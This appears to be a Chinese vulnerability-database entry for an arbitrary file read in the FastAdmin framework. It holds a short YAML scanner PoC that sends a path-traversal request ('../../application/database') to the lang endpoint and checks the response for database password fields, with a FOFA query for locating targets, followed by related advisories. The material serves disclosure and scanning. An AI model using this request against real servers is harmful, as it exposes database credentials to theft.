fastadmin-lang-fileread: Fastadmin 框架 lang 接口任意文件读取

漏洞描述

PoC代码[已公开]

id: fastadmin-lang-fileread

info:
  name: Fastadmin 框架 lang 接口任意文件读取
  author: zan8in
  severity: high
  verified: true
  description: |-
    fofa: app="FASTADMIN-框架"
  tags: fastadmin,fileread
  created: 2024/06/17

rules:
  r0:
    request:
      method: GET
      path: /index/ajax/lang?lang=../../application/database
    expression: |
      response.status == 200 && 
      (response.body.bcontains(b'jsonpReturn') || response.body.bcontains(b'define({')) && 
      response.body.bcontains(b'"database"') && 
      response.body.bcontains(b'"password"')
expression: r0()

相关漏洞推荐

• CVE-2024-7928: FastAdmin < V1.3.4.20220530 - Path Traversal POC

  2025-08-01 | FastAdmin
  A vulnerability, which was classified as problematic, has been found in FastAdmin up to 1.3.3.202201...

• FastAdmin 远程代码执行漏洞 无POC

  2024-12-13 | FastAdmin
  远程代码执行漏洞是指攻击者通过某些漏洞在服务器上执行任意代码，这通常是由于应用程序对外部输入的验证不足或处理不当造成的。攻击者可以利用这个漏洞上传恶意代码或直接通过HTTP请求发送恶意代码，从而控制服...

• FastAdmin /index/ajax/lang 文件读取漏洞 无POC

  2024-06-21 | FastAdmin
  FastAdmin是一款基于ThinkPHP+Bootstrap开发的快速后台开发框架，FastAdmin基于Apache2.0开源协议发布，免费且不限制商业使用，目前被广泛应用于各大行业应用后台管理...

• SourceCodester Pet Grooming Management Software SQL注入漏洞 无POC

  2025-09-22 00:22:31 | SourceCodester Pet Grooming Management Software
  SourceCodester Pet Grooming Management Software是SourceCodester开源的一个宠物美容管理系统。 SourceCodester Pet Groo...

• D-Link DIR-645 命令注入漏洞 无POC

  2025-09-22 00:22:31 | D-Link DIR-645
  D-Link DIR-645是中国友讯（D-Link）公司的一款无线路由器。 D-Link DIR-645 105B01版本存在命令注入漏洞，该漏洞源于对文件/soap.cgi中参数service的错...